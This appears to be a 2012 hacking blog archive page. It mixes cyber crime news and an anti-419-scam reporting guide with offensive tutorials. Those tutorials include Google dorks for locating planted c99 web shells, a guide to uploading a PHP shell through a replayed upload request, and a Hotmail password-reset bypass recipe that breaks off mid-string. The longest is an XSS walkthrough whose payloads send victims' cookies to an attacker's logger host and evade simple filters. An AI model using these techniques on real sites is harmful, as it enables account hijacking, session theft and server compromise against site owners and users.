Monday 30 April 2012

Indian Govt. to set up National Threat Intelligence Centre to fight cyber crime

The Indian government is planning to set up a National Threat Intelligence Centre in view of rising cyber crimes such as identity theft, hacking, financial fraud, child pornography and corporate espionage. While launching a report on cyber security prepared by software industry body Nasscom, Home Minister P Chidambaram said that the government needs to fortify its capacity to deal with online security threats/crimes.
“We have taken numerous steps to protect the physical infrastructure...I think all that we have done to protect the infrastructure in the physical space seems to be a lighter task than when we face threats that have been outlined in the cyber space,” Chidambaram said, acknowledging the online crimes were on the rise in the country.
Chidambaram also stressed that the government needed to set up lawful interception capabilities. Nasscom's report Securing Our Cyber Frontiers' also calls for similar infrastructure to deal with online crime. The report also suggests designing and implementing a competency framework and setting up a Centre of Excellence for best practice in cyber security. Besides, it has called for establishing a cyber command within the defence forces. The minister said the government will look into recommendations made by Nasscom in its report.
It's notable that even the government has been victim of cyber crimes with a number of its websites being hit by cyber attacks. Sachin Pilot, minister of state for communications and IT, recently revealed that 130 sites including those of Planning Commission, the Finance Ministry and various State government agencies, were defaced by cyber attacks. The Defence Research and Development Organisation has also stressed the importance for having more resources to control these cyber attacks in near future.
 

Hackers continue attacks on China Government websites


                                             http://info.cdcl.gov.cn/index.html

Filipino hackers have continued to deface Chinese government websites despite calls from the Philippine government to end the attacks.
On Monday, posts on the "PrivateX," "Anonymous #OccupyPhilippines" and "Anonymous Butuan" Facebook pages reported fresh attacks on websites in China.
The hackers have called their campaign "#OpChinaDown," which is in alleged response to the attacks made by some Chinese hackers on Philippine websites.
The hacking spree is also directly related to the simmering dipsute between Manila and Beijing over ownership of Scarborough Shoal just off Zambales province.
The Chinese websites that fell prey to the latest wave of attacks from the Philippines include:
More variety
The defaced Chinese pages now seem to be more varied, with messages behind left by hackers ranging from a mere "aaaaaaaaaa hacker" to several sentences explaining why the website was hacked.
"The recent defacements occurred on certain Chinese websites were just a simple response to what happened to the UP site. You may continue bullying our country's waters but we will not tolerate you from intimidating our own cyber shores," one message said.
"Those defacements are just a mere response to what you have initially started. We are not trying to start anything. We are just trying to tell you that we do not want to be bullied in our own cyberspace too," it added.
"#OpChinaDown is not a threat. It will be a response. A response to future attacks within our cyberspace. We will leave our country's disputes to our government's hands. Yet this does not mean we will not support them. One Truth Prevails, Scarborough Shoal is ours," it said.

Google Dorks : Backdoored c99 (Find Already Uploaded c99 Shells)

Following are is a google dorks which can be used to find already uploaded shells via Google.


Dork List : 


safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php




Refer the below links for more hacking with Google Dorks :


Google Dorks : Learn How To Use Google For Hacking
Google Dorks : Digging The Web Much Deeper
Google Dorks : Find Unattended Security Cameras



Permanent Reverse Backdoor for IPhone / IPad By CoreSec

If you want to see the full detail, please go to the Source.

    sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-128-CBC + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features.

Sunday 29 April 2012

Uploading Shell using Live HTTP Headers

Hi Guys today i will show you how to upload shell using live HTTP Headers .


Things Required :

  • Firefox Browser
  • Live HTTP Headers (Firefox Add-on)
  • Access To Admin Panel Of a Website


Step By Step Tutorial :

  • First Login into the Website & then find any place to upload Image or something else .
  • Then now add jpg after the php extension so that your shell extension will look like - Shell.php.jpg 
  • Choose the shell & then now click on Tools>Live HTTP Header to start it, now once you have opened the HTTP Header, click on Upload .




  • Now wait till it captures the data, when it has captured the data search for you shell name with extension (shell.php.jpg) & after you have founded it , then select it & then click on Replay button .

  • After clicking on Replay Button again a popup will appear & it will be divided in 2 parts but you have to work in the down part . Again in the down portion part find for your shell name with extension (shell.php.jpg), after you have found you shell name now remove .jpg from teh extension & then again click on replay button . Now your shell will be uploaded as shell.php !! .


Doubts ?? Comment ^_^  

Maharashtra, Karnataka topped cyber crime list in 2010

Maharashtra and Karnataka topped the list of cyber crimes registered in 2010 with 246 cases and 176 cases respectively, communications and IT minister Kapil Sibal said"With the increase in the proliferation of Information Technology and related services, there is a rise in number of cyber crimes and cyber security incidents. The trend in increase in cyber incidents is similar to that worldwide," Sibal had said in a written reply to the Lok Sabha.
Maharashtra recorded the highest number of cyber crime cases at 104 under IPC (Indian Penal Code) in 2010 and had registered 142 cases under the IT Act in the same year, putting the combined cybercrime count at 246.
Similarly, under the IT Act, Karnataka in 2010 had the highest incidents of 153 cyber crime cases while it had 23 cases in the same year registered under IPC - taking its total tally to 176 cases.
Across the country, a total 966 cases of cyber crime reported under Information Technology Act, 2000 in 2010, Sibal said.
As per data maintained by National Crime Records Bureau, a total of 288, 420 and 966 cyber crime cases were registered under the Information Technology Act, 2000 during 2008, 2009 and 2010, respectively, thereby showing an increasing trend, he added.
Under the Indian Penal Code (IPC), a total of 176, 276 and356 cyber crimes were reported during 2008, 2009 and 2010, respectively.
The minister said the government has put in place a monitoring mechanism to detect such cases.
"The Indian Computer Emergency Response Team (CERT-In) scans the Indian cyber space to detect traces of untoward incidents that poses a threat to the cyber space purely from technical point of view," he said.
CERT-In provides mechanisms to detect cyber frauds and cyber crimes like phishing, spamming, pharming and detection of 'BOTS' which are used in cyber frauds and cyber crimes.
CERT-In and Centre for Development of Advanced Computing (C-DAC) are involved in providing basic and advanced training to law enforcement agencies, forensics labs and judiciary on the procedures on the methodology of collecting, analysing and presenting digital evidence, he said.
"Cyber forensic training lab has been set up at Training Academy of Central Bureau of Investigation (CBI) to impart basic and advanced training in cyber forensics and investigation of cyber crimes to police officers associated with CBI," Sibal said.
In addition, the government has also set up such labs in Kerala, Assam, Mizoram, Nagaland, Arunachal Pradesh, Tripura, Meghalaya, Manipur and Jammu and Kashmir, Sibal said.

Source PTI

Saturday 28 April 2012

Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities

1.) Hotmail :
Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .Step 2. Enter the Target Email and enter the 6 characters you see.Step 3. Start Tamper DataStep 4. Delete Element "SendEmail_ContinueCmd"Step 5. change Element "__V_previousForm" to "ResetOptionForm"Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%

Aware ! How to Report Lottery Farud scams/419 scam Must Read

The so-called "419" scam (aka "Nigeria scam" or "West African" scam) is a type of fraud named after an article of the Nigerian penal code under which it is prosecuted. It is also known as "Advance Fee Fraud" because the common principle of all the scam format is to get the victim to send cash (or other items of value) upfront by promising them a large amount of money that they would receive later if they cooperate. In almost all cases, the criminals receive money using Western Union and MoneyGram, instant wire transfer services with which the recipient can't be traced once the money has been picked up. These services should never be used with people you only know by email or telephone!
Typically, victims of the scam are promised a lottery win (example) or a large sum of money sitting in a bank account or in a deposit box at a security company. Often the storyline involves a family member of a former member of government of an African country, a ministerial official, an orphan or widow of a rich businessman, etc. Here is an example. Variants of the plot involving the Philippines, Taiwan, China, Hong Kong, Korea, Iraq, Kuwait, UAE, Mauritius, etc. are also known. Some emails include pictures of boxes stuffed with dollar bills, scans of fake passports, bank or government documents and pictures of supposedly the sender.
Though most of these scams use emails sent in English, we also come across emails translated into French, German, Dutch, Danish, Swedish, Italian, Spanish, Portuguese, Russian, Polish and Czech, Indonesian, as well as English and French letters by postal mail, usually mailed from Spain.
Back in the 1980s and 1990s (for this is nothing new!) the main vehicle for this scam were fax machines.
The victims are promised a fortune for providing a bank account to transfer the money to. Then - if they fall for the scam - they are made to part with thousands and sometimes hundreds of thousands of dollars in "bribes" for local officials or other "fees" (taxes, insurance, legal fees, etc) before the "partners" finally disappear without trace. Here are some typical examples of advance fee demands.
Sometimes fraudulent cashier's checks are issued to the victims, who are asked to wire funds for various charges after the bank says funds are "available" from the check, but before the check has actually cleared. Any transaction that involves cashing a check for a third party and then forwarding funds from it to another person you don't know is almost guaranteed to be a scam.
  • How to report 419 spam to us
  • I received an email telling me I won in a lottery. Is this a scam?
Please also report 419 spam to the abuse department of the company that provides their email accounts. For example, if the mail originates from mrjephills6@tiscali.co.uk then write to abuse@tiscali.co.uk, quoting the full text of the mail including message headers (in Outlook Express you get the full message source via Ctrl+F3; use cut+paste to insert that into your email).
I have received a Bank draft / cashier's check / Money order. What should I do?
Some fake lottery scams as well as other scams by gangs from Nigeria involve counterfeit monetary instruments, such as fake cashier's checks or US Postal Money Orders (MO). Counterfeit instruments are also used in other scams from Nigeria, such as fraudulent purchases of cars, motor bikes and other vehicles as well as horses and other animals. By pretending to first make a payment to the victim, the criminals overcome a reluctance by the victim to send cash to a total stranger in another country.
So how does this work? Any funds made available by a bank against a deposited check or MO become due again when that check or MO bounces (i.e. is recognized as fake by the bank that supposedly issued it). This could be weeks or even months after those funds were wired to another country by the victim as requested by the criminals. The victim will in effect have wired money borrowed from the bank and will be fully liable for that amount. Here is an example:
  • The criminals pose as a legitimate company seeking "representatives" to help process payments from customers of the company.
  • A victim responds and gets promised 10% of every transaction.
  • A "customer" contacts the victim and sends a $40,000 check supposedly for goods supplied by the "company".
  • The victim deposits the check and five days later receives $40,000 in his bank account.
  • The "company" instructs the victim to keep $4,000 and wire $36,000 to some foreign bank account.
  • One month later the bank calls the victim to report that the deposited check was a fake or stolen check and is void. The $40,000 credit is reversed immediately.
  • The victim is now tens of thousands of dollars in debt and may face criminal charges and/or bankrupcy.
The fake checks or MOs are normally mailed from Canada, Nigeria or the UK, though other countries are possible too. They may be part of an elaborate scheme where some person or institution lends funds to a "lottery winner" (the victim), who is unable to come up with the amount demanded for bogus "processing charges" or a minimum deposit for a fake "private bank". They are also used in purchases of big ticket items such as cars. The buyer will send a check that vastly exceeds the value of the car and request the seller to cash it and wire the excess amount to a person who will take care of shipping the purchased car to the buyer. Other examples are "debt repayment" from a third party by check or collecting payments from customers on behalf of a bogus company in Europe, Asia or Africa.
Never deposit such checks or money orders or you could be charged with fraud yourself. In fact under US laws even possession of fake checks and money orders is illegal. Contact your local police and give them check as well as printouts of all emails you have received from the criminals. It's better not to touch the checks or MOs: There may be useful fingerprints on them.
Forward us copies of the emails that preceeded the arrival of the check or MOs. We may be able to identify which other scams this is connected to. See:
  • How can I report scams to you?
I already sent money. How can I get it back?
In most cases the answer is you can't.
Most online scams are not seriously investigated by the police. Basically as soon as they find out the criminals are based abroad they give up, because the effort to track down the criminals would be considerable and the chances of success too uncertain. In the United States the FBI only gets involved in online scams such as fake lotteries, fake inheritance claims, etc. with criminals based in Nigeria, Cote d'Ivoire if damages exceed about $100,000. This unfortunately means that such crimes are almost without risk for the criminals. But even in cases where criminals are arrested and convicted in court it is rare that their victims are compensated, because the money has often disappeared by then.
Personally I don't know of a single case where a 419 victim has got his/her money back.
Realistically the only chance to get money back is if you have made a wire transfer a few hours ago and the money hasn't been picked up yet and you phone Western Union / MoneyGram / the bank to cancel the transfer. If this happens soon enough all you lose is the cost of transfer, with the remainder refunded. Once the money has been picked up, it is gone forever.
That's why we try to put as much information online as possible, so victims find out it's a scam *before* they send money.
Beware of any emails, often pretending to originate from official sources in West Africa, Europe or in the USA which tell you they know about the scam and request details about it to help you get your money back. These usually are sent by the very same criminals who cheated you in the first place. The objective is to get you to send even more money, because the "help" never comes for free. You won't get your money back. Instead you'll lose even more money. The criminals are extremely cruel and without conscience, driving many of their victims into ruin.
How can I help fight this scam?
What can I do to protect others from this scam?
Since you've discovered this website, you know that a suspicious email you received is a scam. Many others do not know and are still at risk. Here is how you can help:
  • Report spam: Report any 419 spam to the webmail provider used to send the spam or to receive replies (see abuse contact list). For example, if the mail originates from mrjephills6@tiscali.co.uk or if that address is listed as a person to contact then write to abuse@tiscali.co.uk, quoting the full text of the mail including message headers (in Outlook Express you get the full message source via Ctrl+F3; use cut+paste to insert that into your email).
    In particular, report any contact addresses mentioned in the body of the spam itself, such as "claims agents" of fake lotteries. These are the most important mailboxes the scammers use. The sooner we get them shut down, the fewer victims there will be.

  • Inform others: Talk about this scam to your family and colleagues at work.

  • Pinging: Contact the scammers from a disposable Yahoo account to get them to reply, then forward the reply as evidence to us (see here for more details).
  • Scambaiting: You can help collect evidence against scammers and waste their time by contacting them from a webmail account (Warning: Do not use your normal email account to do this!). For example, you can create an account at Yahoo.com (link) and then paste the email you received into a message you compose, as if you had received the spam in your Yahoo account. Once you receive a reply, forward a copy of the reply from the criminals to us. To forward an email in Yahoo Mail as an attachment, hold down the Control key while clicking on the Forward button, then address the email to 419@419scam.org. Receiving such replies from "claims agents", "barristers" and "securities companies" allows us to track the true location from which the scammers send their emails (we don't need the emails you sent to the scammers, only their replies). If you really want to waste scammers' time, visit http://www.scambaits.net and read their advice on the art of scambaiting :-)

  • Support our efforts: Thousands of people have been alerted to this scam through our website. They used a search engine and found an email address, a name or a telephone number from a 419 email listed by us. Compiling and publishing such information to educate people like you and your family is a time-consuming process for us. Unlike the criminals we take on, we don't make any money from the time we spend.
  • Filter spam: You can stop receiving 419 and other spams and at the same time support our efforts by purchasing a copy of jwSpamSpy, our spam filter for Windows 2000/XP (US$29.95 / €25 / £18). It has a 30 day free trial period and supports email programs such as Outlook Express or Microsoft Outlook on Windows (not available for Yahoo.com or AOL.com).

  • Report to the police: Report 419 spam to law enforcement in your own country, such as the local police or (in the US) the US Secret Service. An overview of reporting addresses for various countries can be found at the
    If you need to contact law enforcement in Nigeria, the Economic and Financial Crimes Commission (EFCC), a body set up by the Nigerian government in 2002, may be helpful:


  • Spamtraps: If you have a website you can embed email addresses on pages on your site so they are found by address harvesting software or spammers. We can provide you with an email address that you can hide there or you can create your own email account and have it forward email to one of our spamtraps. Please contact us for details! The more fraud spams we receive, the more criminals we can warn people about.
  • Sabotage: Many fraud emails give contact phone numbers. Carefully check the local time before you make any calls, because who would want to be woken up at 3am? If the number starts with +44 70 or +234 80 then check the local time in Lagos, if the number starts with +31 6 or +31 4 check the local time in Amsterdam or Madrid. Some people reply to 419 spam emails and ask the criminals to call them back, giving them phone numbers of other 419 scammers to call. Some people mail large files such as digital snaps to the contact addresses listed in the emails. This can fill up their mailboxes pretty quickly, preventing emails by potential victims from reaching the criminals.
  • Muguito / Mugu Marauder: Most fake bank websites set up by criminals will be shut down by the webhosters when contacted. Sites that stay up get targetted by Muguito / the Mugu Marauder, software that you can run from your broadband connection to kill fake banks. If you have flatrate access without bandwitdth cap you can leave it running over night to deprive fraud sites of bandwidth.
I want these guys arrested. What must I do?
This almost never happens - arrest rates for this type of crime are very low. There are a number of reasons for this. This type of crime crosses national borders and uses a relatively anonymous medium, the internet as well as cellphones. There is no crime location as such and investigations are very technical in nature. There is still too little specialized expertise within the police forces. Also, as a white collar crime it does not get the same kind of resources as violent crime or the ideologically driven so-called "war on drugs".
To get an investigation started you have to report the case to law enforcement in your own country, no matter what phone numbers are listed in the emails. Some countries have institutions that specialize in fraud or online crimes. For example, in the United States the Secret Service investigates financial fraud cases. In other countries special sections of the regular local or state police force will handle reported cases.
An overview of reporting addresses for various countries can be found at the
If this a known scam, why are these guys not arrested?
If you want to find out for yourself, take a printout of a 419 scam email to a police station and try to report a criminal fraud. The officers will basically tell you to delete or ignore such emails when you get them, but not do much more. The sad fact is, the police does not have the resources or the training to cope with the current volume of online scams (though billions of dollars seem to be available for fighting a fruitless "war on drugs", arguably itself an advance fee fraud, but I digress...).
There is no real crime location in online fraud, which raises issues of under which jurisdiction the crime was committed. In most cases the victim and the criminals live in different countries, which means multiple police forces have to cooperate. This is complicated by the fact that classic 419 havens such as Nigeria or other West African countries have major corruption problems. Cote d'Ivoire (Ivory Coast) is in the middle of a civil war and some cities in Nigeria are basically "no go"-areas for the Nigerian federal police.
419 fraud is an industry that on some estimates makes hundreds of millions of dollars per year. It employs thousands of crooks, who vastly outnumber the police officers who investigate their scams. This is not just a few young guys going to an internet cafe to cheat some foreigners. In many cases, African internet cafes are owned by the gang bosses, who pay young men hourly wages for "working" in 419-sweatshops. These bosses are politically well connected and pay off the right people.
Therefore, don't expect this problem to go away any time soon. Instead, expect it to get worse. To use a classic phrase from Nigeria scams, these scams are almost "100% RISK FREE" for the scammers.
How can I report scams to you?
We have received many emails from near-victims who backed out of a fake lottery or other advance fee scam or fraudulent business transaction after they did a search for an email address, name or phone number and came across it on our 419 blacklist. We publish such data to warn potential victims about such scams. The more scammers we can get listed, the more crimes will be prevented. You too can help!
If you've received what looks like a 419 spam (basically, any email from a stranger that promises an unexpected fortune), you're welcome to send us a copy. Please make sure to include the five character string [419] in the subject line of the email (you can follow this with further details, such as name of the fake lottery or other company, alias or email address of the criminal, phone numbers, etc). Examples:
Subject: [419] MICROSOFT EMAIL LOTTERY INTERNATIONAL
Subject: [419] james_robin1@hotmail.com
Subject: [419]
We strongly prefer mails that are submitted as an attached email. That way we will receive an exact copy of the mail you received, as an attachment. We will put that into our database and process it with our spamfilter, which not only lets us verify it looks like a real 419 mail, it also extracts the 419 sender address automatically and we can find out which email provider the criminals used and other information useful for tracking them. Alternatively, you can use copy and paste using the Scam-O-Matic webform, see further below.
How to report fraud by e-mail using Outlook Express

If you are using Outlook Express, open or select the fraud email, then click "Message" and "Forward as Attachment". Type our address <419@419scam.org> into the To: field, use [419] and optional extra information as the subject (see examples above) and click the "Send" button.
How to report fraud by e-mail using Yahoo mail

If you are using Yahoo mail (Classic), open the email, hold down the Control key and click on the "Forward" button. Type our address <419@419scam.org> into the To: field, use [419] as the subject and click the "Send" button.
How to report fraud by e-mail using Incredimail


  • Use File / Save As to save the email somewhere on your hard disk (name doesn't matter).
  • Repeat previous step as necessary for multiple emails.
  • Create a new mail addressed to 419@419scam.org and attach the file(s) created in the previous steps.
How to report fraud using the "Scam-O-Matic" webform


  • Highlight the message body of the suspect mail with your mouse and press Ctrl+C to copy the text into the clipboard.
  • Go to the "Scam-O-Matic" webform and paste it there.
  • You can also provide the email address from which you received the mail, subject lines or header information.
  • If you leave an email address where we can contact you then we can get back to you later if we find more information for you or if we need more information about the scam from you.


Use this form to report suspected telemarketing or Internet fraud. Telemarketing can include offers made by mail or other means that ask you to respond by phone. The information you provide will be transmitted to the appropriate law enforcement agencies
U Can Also Report here :- Link

Port Forward in Windows 8

Many people asked me this doubt how to port forward, so here i'm posting a small tutorial on port Forward in windows 8 .

Step By Step Guide :

  • First Open control Panel & click on Security & System .










  • Open control Panel & click on Windows Firewall .



  • Select Advanced settings in the left column of the Windows Firewall window.




















  • Select Inbound Rules in the left column of the Windows Firewall with Advanced Security window.



















  • Select New Rule in the right column.



















  • Select Port in the New Inbound Rule Wizard and then click Next.





















  • Select which protocol this rule will apply to (TCP or UDP), select Specific local ports, type a port number (80) or a range of port numbers (5000-5010) and then click Next.




















  • Select Allow the connection and then click Next.




















  • Select when this rule applies (check all of them for the port to always stay open) and then click Next.




















  • Give this rule a name and then click Finish to add the new rule.





















Now your Port is Opened & Ready ti Be Used ;) .


Doubts ?? Comment !!

Cross Site Scripting (XSS) Explained (Part 2)


XSS (Cross-Site Scripting), is a type of vulnerability which allows for client-side JavaScript execution. This type of vulnerability can pose a massive security risk if exploited in the correct manner, and has many different uses for attackers. In this paper we will discuss how XSS can be used to steal cookies and other information that can be used in different scenarios. All the examples used have been created solely for the purpose of this paper, to assist you in learning how this vulnerability works.

XSS vulnerabilities are made possible by the coder of the web application or script in question not sanitising the user input correctly and printing out the injected JavaScript straight to the page. We will discuss this in more detail later on in the paper, but here is a basic scenario :>

1. We find a blog which allows users user to input data.
2. This data is displayed, unedited or sanitised on the blog index page.
3. We want to inject a XSS to log the administrative users cookies.
4. We want to login with the cookie we have stolen.



Contents


* 1 What You Will Need
* 2 Identifying & Exploiting the Vulnerability
* 3 Exploiting
* 4 Possible Limitations and Basic Filter Evasion Techniques
* 5 Using the Cookies
* 6 Preventing XSS Vulnerabilities
* 7 References

What You Will Need

Before we start, there are a few things you will need in order to follow the paper efficiently, I have set a list below of what you will need with the required links. I have included a BASIC vulnerable script for you to play with, if you ever see someone using this script for anything other than this, then they deserve to be shot.

Heres a list of things you will need through-out the tutorial :>

Mozilla Firefox. [1]

FF addon : Add & Edit Cookies. [2]

FF addon : Live HTTP Headers. [3]

An ACTIVE cookie logger. Refer to 'scripts' at the end of this tutorial for a logger script.

A basic understanding of JavaScript is an advantage, but not essential. [4]

A XSS vulnerability to test and exploit. Refer to 'scripts' at the end of this tutorial for an example of a vulnerable script. Hosting is up to you, try this free PHP web host :> [5]

The desire and dedication to learn. [Yourself.]


Identifying & Exploiting the Vulnerability

Identifying a XSS vulnerability can be pretty straight forward in most circumstances, we will talk about possible filters and bypassing them in the next section. A typical method of testing for a XSS vulnerability would be infamous 'Alert' test. Anyone with a basic knowledge of JavaScript will know what this is. This test will make an alert box, or message box, pop up on the screen. This is done by executing the JavaScript function Alert().

<script>alert('XSS')</script>

This would display a message box with XSS as the message.

NOTE : There is an obvious way to filter this, but we will talk about that in the next section.

To perform this test we want the page in question to print out the script, so the browser will execute it. So in this case using the included vulnerable test page, input the string <script>alert('XSS')</script>. Now the page will execute this and you should get an alert box displaying the message 'XSS'.

With permanent vulnerability, these tests are not always a good idea, as they cannot be removed in most cases, and the owner of the site will clock it pretty quickly if he sees a message box pop up that's not supposed to be there. Another method of testing for vulnerability is the document.write method. The same concepts and structure is applied to this method as the alert method, we're just using the document.write function instead of the alert function. So this time we insert :

<script>document.write('XSS')</script>

This time the script will return the string 'XSS', (without quotes), and will write it to the page, where the string is supposed to be shown.

Assuming you've efficiently identified a exploitable XSS vulnerability, we need to think about the possible attack vectors and different usages of the XSS, and how we can manipulate it to get certain information. Here is a list of a few of the usages of XSS and a basic description on what they do :>


[] Cookie Stealing ~ Stealing a users cookie, to gain access to their account and bypass certain security measures.

[] Cross-Site Request Forgery[6] ~ Also known as CSRF or XSRF. This type of attack is used to make the user send a request to the server without their knowledge, (e.g., make the user change their password).

[] XSS Worms ~ A XSS worm is a malicious script that has the ability to spread across as site, using a vulnerable point of the site. These can be deadly depending on the intent of the attacker.

[] Door-Forwarding ~ I wasn't sure what to call this. This is where the script creates an iframe to execute an exploit, or open a malicious download on a legitimate website. These attacks are not very common, but are active all over the internet.

[] Keylogging ~ The clue is in t he name. This method allows you to log keystrokes made by the user on the page where the XSS is. Not as common as the CSRF or the worms, but still poses as a huge risk and is overlooked far too often.


The type of attack depends massively on the website, and the type of information you expect in the outcome. For example, on a blogging system with no user accounts, there is no point in making a XSS worm to spread, because there's nowhere to go. A more relevant attack would be CSRF or cookie stealing, so we get admin access at the end of it.


Exploiting

Now assuming you have successfully identified a XSS vulnerability and chosen your attack vector, (in this example we will be covering cookie stealing), we will go over setting up our logger and a few methods of doing so.


Example 1 :


Our cookie logger URL : http://mysite.com/logger.php Vulnerable Page : http://someblog.com/index.php Injection Point : http://someblog.com/post.php


Now we have all this setup, we can crack on. You can use the following methods to log cookies using JavaScript :

<script>location.href='http://mysite.com/logger.php?cookie='+cookie</script>

<script>document.location='http://mysite.com/logger.php?cookie='+cookie</script>

<script>window.open('http://mysite.com/logger.php?cookie='+cookie)</script>

<script>window.location='http://mysite.com/logger.php?cookie='+cookie</script>

Once you have posted this to the blogging system, and it's echoed on the index.php, we just have to be patient and hope the administrator of the site visits it soon, so we can get their cookie.

Another method I want to go over is the <script src=> method. The only difference with this one is that the main script is kept off-site, and is fetched by the <script src> tag, and then executed on the page. This is advantageous in many ways. It can reduce the size of our script on the target site for one, and secondly it can be changed if we want to change the functionality of our XSS. This type of XSS is usually more practical for worms, and keyloggers, but is definitely worth knowing.


Example 2 :

Our cookie logger URL : http://mysite.com/logger.php

Our script URL : http://mysite.com/script.js

Vulnerable Page : http://someblog.com/index.php

Injection Point : http://someblog.com/post.php


Here is how we include or foreign script :


<script src='http://mysite.com/script.js'></script>


Inside the script we just need the logger, use a function from Example 1. An example of our script would be :


location.href='http://mysite.com/logger.php?cookie='+cookie;


Again, like anything, patience is a virtue. I'm assuming if you've read this far you have some level of interest. Just keep at it, no matter how difficult things get. If you get to the point where you think 'I cant fucking do this!', just take a step back, go over it again and take your time. There's no rush is there? You don't have anything to prove. If you do, you're doing this for the wrong reasons.


Possible Limitations and Basic Filter Evasion Techniques

As with every vulnerability, there's always some kind of obstacle that can prevent us doing what we intend to do, whether its filtering out our code, or stopping us altogether. In this section I will go through three examples of filters that you might come across on your travels and how I bypass them. Other people might have a different way around these and in time I'm sure you will pick up your own techniques. The first filter I will show you is a filter which removes the '<script>' and '</script>' tags. While a very basic and common method of filtering, it is ridiculously easy to bypass. There are of course other things which can totally prevent XSS's from happening, such as HTML encoding ect. but I will go through all that in the prevention section near the end.


Example 1 ~ Tag Removal :

I insert the JavaScript : '<script>alert('XSS')</script>',

and it returns the string : alert('XSS').

Never fear, there is away around this. If I now insert this : '<scr<script>ipt>alert('XSS')</scr</script>ipt>'

Now the script will remove the tags, and echo what's left, which is : <script>alert('XSS')</script>.


Example 2 ~ magic_quotes :

I assume you know what magic_quotes is. If not have a read on the Wikipedia or just browse Google.

I insert the JavaScript '<script>alert('XSS')</script>, and it returns the string <script>alert(\'alert\')</script>.

Now obviously this wont execute, because it is not correctly formatted JavaScript, we need to find a way around using the quotes ( ' and " ). Luckily for us, JavaScript has a built in function which you can use to encode/decode strings, called String.FromCharCode(). Now in this case, we want to make a message box pop up that says 'XSS', without the quotes. So we need to execute this JavaScript :

<script>alert(String.fromCharCode(88, 83, 83))</script>

Now this should execute the message box. You can apply this method for a lot of things while exploiting XSS.

HINT : When using integer values, you don't need the quotes. (<script>alert(123456)</script>)

Now, back to stealing our cookies. We want to apply this method to our cookie stealer. For the next example, we will assume that our blog we are trying to get admin on is using BOTH of this filters, so we will apply both of the bypassing methods.

Example :

Our cookie logger URL : http://mysite.com/logger.php Our script URL : http://mysite.com/script.js Vulnerable Page : http://someblog.com/index.php Injection Point : http://someblog.com/post.php

JavaScript to post ((All on one line)) :

<scr<script>ipt>location.href=String.fromCharCode( 104, 116, 116, 112, 58, 47, 47, 100, 117, 115, 101, 99, 117, 114, 105, 116, 121, 46, 99, 111, 109, 47, 108, 111, 103, 103, 101, 114, 46, 112, 104, 112)+document.cookie;</scr</script>ipt>

So now this will echo :

<script>location.href=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 100, 117, 115, 101, 99, 117, 114,105, 116, 121, 46, 99, 111, 109, 47, 108, 111, 103, 103, 101, 114, 46, 112, 104, 112)+document.cookie;</script>

onto the index.php page on our vulnerable site.


The last limitation i would like to go over is the length your allowed to post to the index page. if it was, for example, 50 chars we wouldn't be allowed to post this to the page. There are two main ways around this, the first one is using a foreign script :

Example 1 : <script src='http://site.com/x.js'></script>


Another Example is using another tag, for example, the <img src=> tag.

<img src='http://site.com/x.js'></img>

If your website is a long URL, such as, http://www.thisismyubersuperblog.com/ then you can try using the IP address, which will be <= 27 in length.



Using the Cookies

